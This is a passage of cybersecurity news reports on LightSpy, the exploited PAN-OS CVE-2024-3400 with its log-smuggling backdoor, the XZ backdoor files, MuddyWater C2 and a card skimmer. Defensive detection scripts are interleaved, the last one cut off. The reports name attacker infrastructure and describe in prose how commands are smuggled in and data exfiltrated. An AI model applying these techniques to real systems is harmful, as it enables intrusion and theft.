"By expanding their tactics to include SaaS applications and cloud environments, the evolution of Muddled Libra's methodology shows the multidimensionality of cyberattacks in the modern threat landscape," Zimmermann concluded. "The use of cloud environments to gather large amounts of information and quickly exfiltrate it poses new challenges to defenders."
Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users
15.4.24
OS
The Hacker News
Cybersecurity researchers have
discovered a "renewed" cyber espionage campaign targeting users in South Asia
with the aim of delivering an Apple iOS spyware implant called LightSpy.
"The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular framework with extensive spying features," the BlackBerry Threat Research and Intelligence Team said in a report published last week.
There is evidence to suggest that the campaign may have targeted India based on VirusTotal submissions from within its borders.
First documented in 2020 by Trend Micro and Kaspersky, LightSpy refers to an advanced iOS backdoor that's distributed via watering hole attacks through compromised news sites.
A subsequent analysis from ThreatFabric in October 2023 uncovered infrastructure and functionality overlaps between the malware and an Android spyware known as DragonEgg, which is attributed to the Chinese nation-state group APT41 (aka Winnti).
The initial intrusion vector is presently not known, although it's suspected to be via news websites that have been breached and are known to be visited by the targets on a regular basis.
The starting point is a first-stage loader that acts as a launchpad for the core LightSpy backdoor and its assorted plugins that are retrieved from a remote server to pull off the data-gathering functions.
LightSpy is both fully-featured and modular, allowing threat actors to harvest
sensitive information, including contacts, SMS messages, precise location data
and sound recordings during VoIP calls.
The latest version discovered by the Canadian cybersecurity firm further expands on its capabilities to steal files as well as data from popular apps like Telegram, QQ, and WeChat, iCloud Keychain data, and web browser history from Safari and Google Chrome.
The complex espionage framework also features capabilities to gather a list of connected Wi-Fi networks, details about installed apps, take pictures using the device's camera, record audio, and execute shell commands received from the server, likely enabling it to hijack control of the infected devices.
"LightSpy employs certificate pinning to prevent detection and interception of communication with its command-and-control (C2) server," BlackBerry said. "Thus, if the victim is on a network where traffic is being analyzed, no connection to the C2 server will be established."
A further examination of the implant's source code suggests the involvement of native Chinese speakers, raising the possibility of state-sponsored activity. What's more, LightSpy communicates with a server located at 103.27[.]109[.]217, which also hosts an administrator panel that displays an error message in Chinese when entering incorrect login credentials.
The development comes as Apple said it sent out threat notifications to users in 92 countries, counting India, that they may have been targeted by mercenary spyware attacks.
"The return of LightSpy, now equipped with the versatile 'F_Warehouse' framework, signals an escalation in mobile espionage threats," BlackBerry said.
"The expanded capabilities of the malware, including extensive data exfiltration, audio surveillance, and potential full device control, pose a severe risk to targeted individuals and organizations in Southern Asia."
Palo Alto Networks Releases Urgent Fixes for Exploited PAN-OS Vulnerability
15.4.24
Vulnerability
The Hacker News
Palo Alto Networks has released
hotfixes to address a maximum-severity security flaw impacting PAN-OS software
that has come under active exploitation in the wild.
Tracked as CVE-2024-3400 (CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root privileges on the firewall.
Fixes for the shortcoming are available in the following versions -
PAN-OS 10.2.9-h1
PAN-OS 11.0.4-h1, and
PAN-OS 11.1.2-h3
Patches for
other commonly deployed maintenance releases are expected to be released over
the next few days.
"This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled," the company clarified in its updated advisory.
It also said that while Cloud NGFW firewalls are not impacted by CVE-2024-3400, specific PAN-OS versions and distinct feature configurations of firewall VMs deployed and managed by customers in the cloud are affected.
The exact origins of the threat actor exploiting the flaw are presently unknown but Palo Alto Networks Unit 42 is tracking the malicious activity under the name Operation MidnightEclipse.
Volexity, which attributed it to a cluster dubbed UTA0218, said CVE-2024-3400 has been leveraged since at least March 26, 2024, to deliver a Python-based backdoor called UPSTYLE on the firewall that allows for the execution of arbitrary commands via specially crafted requests.
It is unclear how widespread the exploitation has been, but the threat intelligence firm said it has "evidence of potential reconnaissance activity involving more widespread exploitation aimed at identifying vulnerable systems."
In attacks documented to date, UTA0218 has been observed deploying additional payloads to launch reverse shells, exfiltrate PAN-OS configuration data, remove log files, and deploy the Golang tunneling tool named GOST (GO Simple Tunnel).
No other follow-up malware or persistence methods are said to have been deployed on victim networks, although it's unknown if it's by design or due to early detection and response.
Ex-Security Engineer Jailed 3 Years for $12.3 Million Crypto Exchange Thefts
14.4.24
Crime
The Hacker News
A former security engineer has been
sentenced to three years in prison in the U.S. for charges relating to hacking
two decentralized cryptocurrency exchanges in July 2022 and stealing over $12.3
million.
Shakeeb Ahmed, the defendant in question, pled guilty to one count of computer fraud in December 2023 following his arrest in July.
"At the time of both attacks, Ahmed, a U.S. citizen, was a senior security engineer for an international technology company whose resume reflected skills in, among other things, reverse engineering smart contracts and blockchain audits, which are some of the specialized skills Ahmed used to execute the hacks," the U.S. Department of Justice (DoJ) noted at the time.
While the name of the company was not disclosed, he was residing in Manhattan, New York, and working for Amazon before he was apprehended.
Court documents show that Ahmed exploited a security flaw in an unnamed cryptocurrency exchange's smart contracts to insert "fake pricing data to fraudulently generate millions of dollars' worth of inflated fees," which he was able to withdraw.
Subsequently, he initiated contact with the company and agreed to return most of the funds except for $1.5 million if the exchange agreed not to alert law enforcement about the flash loan attack.
It's worth noting that CoinDesk reported in early July 2022 that an unknown attacker returned more than $8 million worth of cryptocurrency to a Solana-based crypto exchange called Crema Finance, while keeping $1.68 million as a "white hat" bounty.
Ahmed has also been accused of carrying out an attack on a second decentralized cryptocurrency exchange called Nirvana Finance, siphoning $3.6 million in the process, ultimately leading to its shutdown.
"Ahmed used an exploit he discovered in Nirvana's smart contracts to allow him to purchase cryptocurrency from Nirvana at a lower price than the contract was designed to allow," the DoJ said.
"He then immediately resold that cryptocurrency to Nirvana at a higher price. Nirvana offered Ahmed a 'bug bounty' of as much as $600,000 to return the stolen funds, but Ahmed instead demanded $1.4 million, did not reach agreement with Nirvana, and kept all the stolen funds."
The defendant then laundered the stolen funds to cover up the trail using cross-chain bridges to move the illicit digital assets from Solana to Ethereum and exchanging the proceeds into Monero using mixers like Samourai Whirlpool.
Besides the three-year jail term, Ahmed has been sentenced to three years of supervised release and ordered to forfeit approximately $12.3 million and pay restitution amounting to more than $5 million to the two impacted crypto exchanges.
Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack
13.4.24
Virus
The Hacker News
Threat actors have been exploiting
the newly disclosed zero-day flaw in Palo Alto Networks PAN-OS software dating
back to March 26, 2024, nearly three weeks before it came to light yesterday.
The network security company's Unit 42 division is tracking the activity under the name Operation MidnightEclipse, attributing it as the work of a single threat actor of unknown provenance.
The security vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), is a command injection flaw that enables unauthenticated attackers to execute arbitrary code with root privileges on the firewall.
It's worth noting that the issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewall configurations that have GlobalProtect gateway and device telemetry enabled.
Operation MidnightEclipse entails the exploitation of the flaw to create a cron job that runs every minute to fetch commands hosted on an external server ("172.233.228[.]93/policy" or "172.233.228[.]93/patch"), which are then executed using the bash shell.
The attackers are said to have manually managed an access control list (ACL) for the command-and-control (C2) server to ensure that it can only be accessed from the device communicating with it.
While the exact nature of the command is unknown, it's suspected that the URL serves as a delivery vehicle for a Python-based backdoor on the firewall that Volexity – which discovered in-the-wild exploitation of CVE-2024-3400 on April 10, 2024 – is tracking as UPSTYLE and is hosted on a different server ("144.172.79[.]92" and "nhdata.s3-us-west-2.amazonaws[.]com").
The Python file is designed to write and launch another Python script ("system.pth"), which subsequently decodes and runs the embedded backdoor component that's responsible for executing the threat actor's commands in a file called "sslvpn_ngx_error.log." The results of the operation are written to a separate file named "bootstrap.min.css."
The most interesting aspect of the attack chain is that both the files used to extract the commands and write the results are legitimate files associated with the firewall -
/var/log/pan/sslvpn_ngx_error.log
/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css
As for how
the commands are written to the web server error log, the threat actor forges
specially crafted network requests to a non-existent web page containing a
specific pattern. The backdoor then parses the log file and searches for the
line matching the same regular expression ("img\[([a-zA-Z0-9+/=]+)\]") to decode
and run the command within it.
"The script will then create another thread that runs a function called restore," Unit 42 said. "The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file and sets the access and modified times to their originals."
The main goal appears to be to avoid leaving traces of the command outputs,
necessitating that the results are exfiltrated within 15 seconds before the file
is overwritten.
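The two artifacts just described give a defender concrete things to look for: the `img[...]` marker with a base64 body in the GlobalProtect error log, and a CSS file whose content is rewritten but whose timestamps are put back, which defeats any mtime-based check. The block below is an added example (not Unit 42's or Volexity's tooling) of a hunt script for both. The log lines are constructed in nginx error-log style with a harmless `whoami` payload; the regular expression is the one quoted above, and the CSS baseline is a constructed stand-in for a known-good copy of bootstrap.min.css.

```python
"""Hunting helpers for the UPSTYLE log-smuggling technique.  Added
example, not code from Unit 42, Volexity, or Palo Alto Networks."""
import base64
import binascii
import hashlib
import re

# Marker pattern reported by Unit 42 for the commands embedded in
# sslvpn_ngx_error.log.
MARKER = re.compile(r"img\[([a-zA-Z0-9+/=]+)\]")

# Constructed sample lines; only the third carries a marker, and its
# base64 body decodes to the harmless string 'whoami'.
SAMPLE_LOG = """\
2024/04/11 10:15:02 [error] 1234#0: *88 open() "/var/appweb/sslvpndocs/global-protect/portal/favicon.ico" failed (2: No such file or directory)
2024/04/11 10:15:03 [error] 1234#0: *89 open() "/var/appweb/sslvpndocs/global-protect/portal/robots.txt" failed (2: No such file or directory)
2024/04/11 10:15:05 [error] 1234#0: *90 open() "/var/appweb/sslvpndocs/global-protect/portal/img[d2hvYW1p]" failed (2: No such file or directory)
"""

# Constructed stand-in for a known-good static asset and its hash, which
# a defender would record from a clean device or the vendor image.
BASELINE_CSS = b"/* constructed stand-in for bootstrap.min.css */\nbody{margin:0}\n"
BASELINE_SHA256 = hashlib.sha256(BASELINE_CSS).hexdigest()


def find_smuggled_commands(log_text: str) -> list[dict]:
    """One record per marker found in the log: line number, the raw
    base64 token, and its decoded text (None when it is not valid base64,
    which is still worth a look since the marker itself is anomalous)."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for token in MARKER.findall(line):
            try:
                decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                decoded = None
            findings.append({"line": lineno, "token": token, "decoded": decoded})
    return findings


def static_asset_unchanged(current_content: bytes, baseline_sha256_hex: str) -> bool:
    """Compare a static asset against a recorded hash.  The backdoor
    restores access and modification times after use, so only content
    hashing (not mtime) is a reliable integrity check here."""
    return hashlib.sha256(current_content).hexdigest() == baseline_sha256_hex


if __name__ == "__main__":
    for hit in find_smuggled_commands(SAMPLE_LOG):
        print(f"line {hit['line']}: token={hit['token']} decoded={hit['decoded']!r}")
    tampered = BASELINE_CSS + b"\n/* command output would be appended here */\n"
    print("baseline intact:", static_asset_unchanged(BASELINE_CSS, BASELINE_SHA256))
    print("tampered intact:", static_asset_unchanged(tampered, BASELINE_SHA256))
```

Because the results file is restored within 15 seconds, a periodic hash check can miss the window; the error-log marker persists, so the log scan is the check to run first, followed by the usual review of cron entries for a job fetching from an external host.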
Volexity, in its own analysis, said it observed the threat actor remotely exploiting the firewall to create a reverse shell, download additional tooling, pivot into internal networks, and ultimately exfiltrate data. The exact scale of the campaign is presently unclear. The adversary has been assigned the moniker UTA0218 by the company.
"The tradecraft and speed employed by the attacker suggests a highly capable threat actor with a clear playbook of what to access to further their objectives," the American cybersecurity firm said.
"UTA0218's initial objectives were aimed at grabbing the domain backup DPAPI keys and targeting active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with the users' DPAPI keys."
Organizations are recommended to look for signs of lateral movement internally from their Palo Alto Networks GlobalProtect firewall device.
The development has also prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by April 19 to mitigate potential threats. Palo Alto Networks is expected to release fixes for the flaw no later than April 14.
"Targeting edge devices remains a popular vector of attack for capable threat actors who have the time and resources to invest into researching new vulnerabilities," Volexity said.
"It is highly likely UTA0218 is a state-backed threat actor based on the resources required to develop and exploit a vulnerability of this nature, the type of victims targeted by this actor, and the capabilities displayed to install the Python backdoor and further access victim networks."
U.S. Treasury Sanctions Hamas Spokesperson for Cyber Influence Operations
13.4.24
BigBrothers
The Hacker News
The U.S. Treasury Department's
Office of Foreign Assets Control (OFAC) on Friday announced sanctions against an
official associated with Hamas for his involvement in cyber influence
operations.
Hudhayfa Samir 'Abdallah al-Kahlut, 39, also known as Abu Ubaida, has served as the public spokesperson of Izz al-Din al-Qassam Brigades, the military wing of Hamas, since at least 2007.
"He publicly threatened to execute civilian hostages held by Hamas following the terrorist group's October 7, 2023, attacks on Israel," the Treasury Department said.
"Al-Kahlut leads the cyber influence department of al-Qassam Brigades. He was involved in procuring servers and domains in Iran to host the official al-Qassam Brigades website in cooperation with Iranian institutions."
Alongside Al-Kahlut, two other individuals, William Abu Shanab, 56, and Bara'a Hasan Farhat, 35, were sanctioned for their role in the manufacturing of unmanned aerial vehicles (UAVs) used by Hamas to conduct terrorist operations, including urban warfare and intelligence gathering.
Both Abu Shanab and his assistant Farhat are said to be part of the Lebanon-based al-Shimali unit, where the former is a commander.
Coinciding with the actions taken by the U.S., the European Union imposed sanctions of its own against Al-Qassam Brigades, Al-Quds Brigades, and Nukhba Force for their "brutal and indiscriminate terrorist attacks" targeting Israel last year.
While Al-Quds Brigades is the armed wing of Palestinian Islamic Jihad, Nukhba Force is a special forces unit of Hamas.
The joint action, said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson, is aimed at "disrupting Hamas's ability to conduct further attacks, including through cyber warfare and the production of UAVs."
The development arrived a little over two months after the U.S. government sanctioned six Iranian officials associated with the Iranian intelligence agency for attacking critical infrastructure entities in the U.S. and other countries.
Popular Rust Crate liblzma-sys Compromised with XZ Utils Backdoor Files
13.4.24
Virus
The Hacker News
"Test files" associated with the XZ
Utils backdoor have made their way to a Rust crate known as liblzma-sys, new
findings from Phylum reveal.
liblzma-sys, which has been downloaded over 21,000 times to date, provides Rust developers with bindings to the liblzma implementation, an underlying library that is part of the XZ Utils data compression software. The impacted version in question is 0.3.2.
"The current distribution (v0.3.2) on Crates.io contains the test files for XZ that contain the backdoor," Phylum noted in a GitHub issue raised on April 9, 2024.
"The test files themselves are not included in either the .tar.gz nor the .zip tags here on GitHub and are only present in liblzma-sys_0.3.2.crate that is installed from Crates.io."
Following responsible disclosure, the files in question ("tests/files/bad-3-corrupt_lzma2.xz" and "tests/files/good-large_compressed.lzma") have since been removed from liblzma-sys version 0.3.3 released on April 10. The previous version of the crate has been pulled from the registry.
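A defender-side check for the situation described above, added here as an example (not Phylum's or the crate maintainers' tooling): it opens a downloaded .crate archive, reads the packaged version from Cargo.toml, and reports whether either of the two test-file paths named on the page is present. The sample crate is constructed in memory so the check runs offline; the layout (a gzip tar with members under `<name>-<version>/`) is the standard .crate format.

```python
"""Scan a .crate archive for the XZ backdoor test files named above.

Added example, not the crate's own tooling.  A .crate is a gzip-compressed
tar whose members sit under <name>-<version>/; this lists the members,
matches them against the two paths quoted on the page, and reads the
packaged version out of Cargo.toml.  The sample crate is constructed
in memory (sample data, not the real liblzma-sys_0.3.2.crate).
"""
import io
import re
import tarfile

# Paths quoted on the page, relative to the crate root.
BACKDOOR_TEST_FILES = {
    "tests/files/bad-3-corrupt_lzma2.xz",
    "tests/files/good-large_compressed.lzma",
}
# First `version = "..."` line; in a packaged Cargo.toml that is [package].version
_VERSION_RE = re.compile(r'^\s*version\s*=\s*"([^"]+)"', re.M)


def inspect_crate(crate_bytes: bytes) -> dict:
    """Return {'version': str|None, 'suspicious': [relative paths], 'members': int}."""
    result = {"version": None, "suspicious": [], "members": 0}
    with tarfile.open(fileobj=io.BytesIO(crate_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            result["members"] += 1
            # Strip the leading <name>-<version>/ directory.
            rel = member.name.split("/", 1)[1] if "/" in member.name else member.name
            if rel in BACKDOOR_TEST_FILES:
                result["suspicious"].append(rel)
            if rel == "Cargo.toml" and member.isfile():
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                m = _VERSION_RE.search(text)
                if m:
                    result["version"] = m.group(1)
    return result


def build_sample_crate(version: str, include_test_files: bool) -> bytes:
    """Construct a minimal liblzma-sys-like .crate in memory (constructed sample)."""
    root = f"liblzma-sys-{version}"
    files = {
        f"{root}/Cargo.toml": f'[package]\nname = "liblzma-sys"\nversion = "{version}"\n',
        f"{root}/src/lib.rs": "// placeholder\n",
    }
    if include_test_files:
        for path in BACKDOOR_TEST_FILES:
            files[f"{root}/{path}"] = "<binary test data omitted>\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for ver, tainted in (("0.3.2", True), ("0.3.3", False)):
        print(ver, inspect_crate(build_sample_crate(ver, tainted)))
```

For a real archive, pass the bytes of the file fetched from the registry (for example `~/.cargo/registry/cache/*/liblzma-sys-0.3.2.crate`) to `inspect_crate`.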
"The malicious test files were committed upstream, but due to the malicious build instructions not being present in the upstream repository, they were never called or executed," Snyk said in an advisory of its own.
The backdoor in XZ Utils was discovered in late March when Microsoft engineer Andres Freund identified malicious commits to the command-line utility impacting versions 5.6.0 and 5.6.1 released in February and March 2024, respectively. The popular package is integrated into many Linux distributions.
The code commits, made by a now-suspended GitHub user named JiaT75 (aka Jia
Tan), essentially made it possible to circumvent authentication controls within
SSH to execute code remotely, potentially allowing the operators to take over
the system.
"The overall compromise spanned over two years," SentinelOne researchers Sarthak Misraa and Antonio Pirozzi said in an analysis published this week. "Under the alias Jia Tan, the actor began contributing to the xz project on October 29, 2021."
"Initially, the commits were innocuous and minor. However, the actor gradually became a more active contributor to the project, steadily gaining reputation and trust within the community."
According to Russian cybersecurity company Kaspersky, the trojanized changes take the form of a multi-stage operation.
"The source code of the build infrastructure that generated the final packages was slightly modified (by introducing an additional file build-to-host.m4) to extract the next stage script that was hidden in a test case file (bad-3-corrupt_lzma2.xz)," it said.
"These scripts in turn extracted a malicious binary component from another test
case file (good-large_compressed.lzma) that was linked with the legitimate
library during the compilation process to be shipped to Linux repositories."
The payload, a shell script, is responsible for the extraction and the execution of the backdoor, which, in turn, hooks into specific functions – RSA_public_decrypt, EVP_PKEY_set1_RSA, and RSA_get0_key – that will allow it to monitor every SSH connection to the infected machine.
The primary goal of the backdoor slipped into liblzma is to manipulate Secure Shell Daemon (sshd) and monitor for commands sent by an attacker at the start of an SSH session, effectively introducing a way to achieve remote code execution.
While the early discovery of the backdoor averted what could have been a widespread compromise of the Linux ecosystem, the development is once again a sign that open-source package maintainers are being targeted by social engineering campaigns with the goal of staging software supply chain attacks.
In this case, it materialized in the form of a coordinated activity that presumably featured several sockpuppet accounts that orchestrated a pressure campaign aimed at forcing the project's longtime maintainer to bring on board a co-maintainer to add more features and address issues.
"The flurry of open source code contributions and related pressure campaigns from previously unknown developer accounts suggests that a coordinated social engineering campaign using phony developer accounts was used to sneak malicious code into a widely used open-source project," ReversingLabs said.
SentinelOne researchers revealed that the subtle code changes made by JiaT75 between versions 5.6.0 and 5.6.1 suggest that the modifications were engineered to enhance the backdoor's modularity and plant more malware.
As of April 9, 2024, the source code repository associated with XZ Utils has been restored on GitHub, nearly two weeks after it was disabled for a violation of the company's terms of service.
The attribution of the operation and the intended targets are currently unknown, although in light of the planning and sophistication behind it, the threat actor is suspected to be a state-sponsored entity.
"It's evident that this backdoor is highly complex and employs sophisticated methods to evade detection," Kaspersky said.
Iranian MuddyWater Hackers Adopt New C2 Tool 'DarkBeatC2' in Latest Campaign
12.4.24
APT
The Hacker News
The Iranian threat actor known as
MuddyWater has been attributed to a new command-and-control (C2) infrastructure
called DarkBeatC2, becoming the latest such tool in its arsenal after
SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go.
"While occasionally switching to a new remote administration tool or changing their C2 framework, MuddyWater's methods remain constant," Deep Instinct security researcher Simon Kenin said in a technical report published last week.
MuddyWater, also called Boggy Serpens, Mango Sandstorm, and TA450, is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS). It's known to be active since at least 2017, orchestrating spear-phishing attacks that lead to the deployment of various legitimate Remote Monitoring and Management (RMM) solutions on compromised systems.
Prior findings from Microsoft show that the group has ties with another Iranian threat activity cluster tracked as Storm-1084 (aka DarkBit), with the latter leveraging the access to orchestrate destructive wiper attacks against Israeli entities.
The latest attack campaign, details of which were also previously revealed by Proofpoint last month, commences with spear-phishing emails sent from compromised accounts that contain links or attachments hosted on services like Egnyte to deliver the Atera Agent software.
One of the URLs in question is "kinneretacil.egnyte[.]com," where the subdomain "kinneretacil" refers to "kinneret.ac.il," an educational institution in Israel and a customer of Rashim, which, in turn, was breached by Lord Nemesis (aka Nemesis Kitten or TunnelVision) as part of a supply chain attack targeting the academic sector in the country.
Lord Nemesis is suspected of being a "faketivist" operation directed against Israel. It's also worth noting that Nemesis Kitten is a private contracting company called Najee Technology, a subgroup within Mint Sandstorm that's backed by Iran's Islamic Revolutionary Guard Corps (IRGC). The company was sanctioned by the U.S. Treasury in September 2022.
"This is important because if 'Lord Nemesis' were able to breach Rashim's email system, they might have breached the email systems of Rashim's customers using the admin accounts that now we know they obtained from 'Rashim,'" Kenin explained.
The web of connections has raised the possibility that MuddyWater may have used
the email account associated with Kinneret to distribute the links, thereby
giving the messages an illusion of trust and tricking the recipients into
clicking them.
"While not conclusive, the timeframe and context of the events indicate a potential hand-off or collaboration between IRGC and MOIS to inflict as much harm as possible on Israeli organizations and individuals," Kenin further added.
The attacks are also notable for relying on a set of domains and IP addresses collectively dubbed DarkBeatC2 that are responsible for managing the infected endpoints. This is accomplished by means of PowerShell code designed to establish contact with the C2 server upon gaining initial access through other means.
According to independent findings from Palo Alto Networks Unit 42, the threat actor has been observed abusing the Windows Registry's AutodialDLL function to side-load a malicious DLL and ultimately set up connections with a DarkBeatC2 domain.
The mechanism, in particular, involves establishing persistence through a scheduled task that runs PowerShell to leverage the AutodialDLL registry key and load the DLL for the C2 framework. The cybersecurity firm said the technique was put to use in a cyber attack aimed at an unnamed Middle East target.
Other methods adopted by MuddyWater to establish a C2 connection include the use of a first-stage payload delivered via the spear-phishing email and leveraging DLL side-loading to execute a malicious library.
A successful contact allows the infected host to receive PowerShell responses that, for their part, fetch two more PowerShell scripts from the same server.
While one of the scripts is designed to read the contents of a file named "C:\ProgramData\SysInt.log" and transmit them to the C2 server via an HTTP POST request, the second script periodically polls the server to obtain additional payloads and writes the results of the execution to "SysInt.log." The exact nature of the next-stage payload is currently unknown.
"This framework is similar to the previous C2 frameworks used by MuddyWater," Kenin said. "PowerShell remains their 'bread and butter.'"
Curious Serpens Targets Defense Sector with FalseFont Backdoor
The
disclosure comes as Unit 42 unpacked the inner workings of a backdoor called
FalseFont that's used by an Iranian threat actor known as Peach Sandstorm (aka
APT33, Curious Serpens, Elfin, and Refined Kitten) in attacks targeting the
aerospace and defense sectors.
"The threat actors mimic legitimate human resources software, using a fake job recruitment process to trick victims into installing the backdoor," security researchers Tom Fakterman, Daniel Frank, and Jerome Tujague said, describing FalseFont as "highly targeted."
Once installed, it presents a login interface impersonating an aerospace company and captures the credentials as well as the educational and employment history entered by the victim, sending them to a threat-actor controlled C2 server in JSON format.
The implant, besides its graphical user interface (GUI) component for user inputs, also stealthily activates a second component in the background that establishes persistence on the system, gathers system metadata, and executes commands and processes sent from the C2 server.
Other features of FalseFont include the ability to download and upload files, steal credentials, capture screenshots, terminate specific processes, run PowerShell commands, and self-update the malware.
Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack
12.4.24
Vulnerability
The Hacker News
Palo Alto Networks is warning that
a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways
is being exploited in the wild.
Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.
"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall," the company said in an advisory published today.
The flaw impacts the following versions of PAN-OS, with fixes expected to be released on April 14, 2024 -
PAN-OS < 11.1.2-h3
PAN-OS < 11.0.4-h1
PAN-OS < 10.2.9-h1
The company
also said that the issue is applicable only to firewalls that have the
configurations for both GlobalProtect gateway (Network > GlobalProtect >
Gateways) and device telemetry (Device > Setup > Telemetry) enabled.
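A version-triage helper for the advisory details above, added as an example (not Palo Alto Networks' own tooling). It parses PAN-OS version strings of the form MAJOR.MINOR.MAINT with an optional -hN hotfix suffix, compares them against the three fixed releases quoted on the page, and combines the result with the two configuration preconditions the vendor named; branches the page does not list are reported as unlisted rather than safe.

```python
"""Triage a PAN-OS firewall against the affected ranges quoted above.

Added example, not vendor tooling.  Affected ranges on the page:
  PAN-OS < 11.1.2-h3, < 11.0.4-h1, < 10.2.9-h1
and the issue applies only when both the GlobalProtect gateway and
device telemetry are configured.
"""
import re
from typing import NamedTuple, Optional

# Fixed releases as quoted on the page; anything below them on the same
# MAJOR.MINOR branch is affected.
FIXED_RELEASES = ("11.1.2-h3", "11.0.4-h1", "10.2.9-h1")

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


class PanOsVersion(NamedTuple):
    major: int
    minor: int
    maint: int
    hotfix: int  # 0 when there is no -hN suffix

    @property
    def branch(self) -> tuple:
        return (self.major, self.minor)


def parse_version(text: str) -> PanOsVersion:
    """Parse e.g. '11.1.2-h3' -> (11, 1, 2, 3).

    A release without a hotfix sorts below any hotfix of the same
    maintenance release, so 11.1.2 < 11.1.2-h1 < 11.1.2-h3 < 11.1.3.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return PanOsVersion(int(major), int(minor), int(maint), int(hotfix or 0))


def affected_by_version(text: str) -> Optional[bool]:
    """True if below the fixed release on its branch, False if at or above it,
    None if the branch is not among those listed on the page."""
    v = parse_version(text)
    for fixed_text in FIXED_RELEASES:
        fixed = parse_version(fixed_text)
        if fixed.branch == v.branch:
            return v < fixed  # NamedTuple comparison is field-by-field
    return None


def triage(text: str, globalprotect_gateway: bool, telemetry: bool) -> str:
    """Combine the version check with the configuration preconditions."""
    by_version = affected_by_version(text)
    if by_version is None:
        return "branch not listed in the advisory excerpt; consult the vendor advisory"
    if not by_version:
        return "fixed release; not affected"
    if globalprotect_gateway and telemetry:
        return "AFFECTED: vulnerable release with GlobalProtect gateway and telemetry enabled"
    return ("vulnerable release; advisory states the issue applies only when both "
            "GlobalProtect gateway and telemetry are enabled")


if __name__ == "__main__":
    for ver in ("11.1.2", "11.1.2-h3", "10.2.8-h5", "10.1.9"):
        print(ver, "->", triage(ver, True, True))
```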
Cybersecurity firm Volexity has been credited with discovering and reporting the bug.
While there are no other technical details about the nature of the attacks, Palo Alto Networks acknowledged that it's "aware of a limited number of attacks that leverage the exploitation of this vulnerability."
In the interim, it's recommending that customers with a Threat Prevention subscription enable Threat ID 95187 to secure against the threat.
The development comes as Chinese threat actors have increasingly relied on zero-day flaws impacting Barracuda Networks, Fortinet, Ivanti, and VMware to breach targets of interest and deploy covert backdoors for persistent access.
Sneaky Credit Card Skimmer Disguised as Harmless Facebook Tracker
12.4.24
Crime
The Hacker News
Cybersecurity researchers have
discovered a credit card skimmer that's concealed within a fake Meta Pixel
tracker script in an attempt to evade detection.
Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the "Miscellaneous Scripts" section of the Magento admin panel.
"Custom script editors are popular with bad actors because they allow for external third party (and malicious) JavaScript and can easily pretend to be benign by leveraging naming conventions that match popular scripts like Google Analytics or libraries like JQuery," security researcher Matt Morrow said.
The bogus Meta Pixel tracker script identified by the web security company contains similar elements as its legitimate counterpart, but a closer examination reveals the addition of JavaScript code that substitutes references to the domain "connect.facebook[.]net" with "b-connected[.]com."
While the former is a genuine domain linked to the Pixel tracking functionality, the replacement domain is used to load an additional malicious script ("fbevents.js") that monitors if a victim is on a checkout page, and if so, serves a fraudulent overlay to grab their credit card details.
It's worth noting that "b-connected[.]com" is a legitimate e-commerce website that has been compromised at some point to host the skimmer code. What's more, the information entered into the fake form is exfiltrated to another compromised site ("www.donjuguetes[.]es").
To mitigate such risks, it's recommended to keep the sites up-to-date, periodically review admin accounts to determine if all of them are valid, and update passwords on a frequent basis.
This is particularly important as threat actors are known to leverage weak passwords and flaws in WordPress plugins to gain elevated access to a target site and add rogue admin users, which are then used to perform various other activities, including adding additional plugins and backdoors.
"Because credit card stealers often wait for keywords such as 'checkout' or
'onepage,' they may not become visible until the checkout page has loaded,"
Morrow said.
"Since most checkout pages are dynamically generated based on cookie data and other variables passed to the page, these scripts evade public scanners and the only way to identify the malware is to check the page source or watch network traffic. These scripts run silently in the background."
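A page-source check that applies the two observations above, added here as an example (not Sucuri's tooling): a genuine Meta Pixel loader pulls fbevents.js from connect.facebook.net, so any quoted fbevents.js URL on another host, or script code that rewrites the connect.facebook.net string at runtime, is flagged. The HTML below is a constructed sample; in practice the input is the served checkout page (fetched with the session cookies that make it render), since the quoted advice notes the loader may not appear in the stored template.

```python
"""Flag a tampered Meta Pixel loader in served page source.

Added example, not Sucuri's code.  Two heuristics drawn from the text:
  1. a quoted URL named fbevents.js whose host is not connect.facebook.net
  2. script code calling .replace('connect.facebook.net', ...) on the loader URL
"""
import re
from urllib.parse import urlsplit

LEGIT_PIXEL_HOST = "connect.facebook.net"

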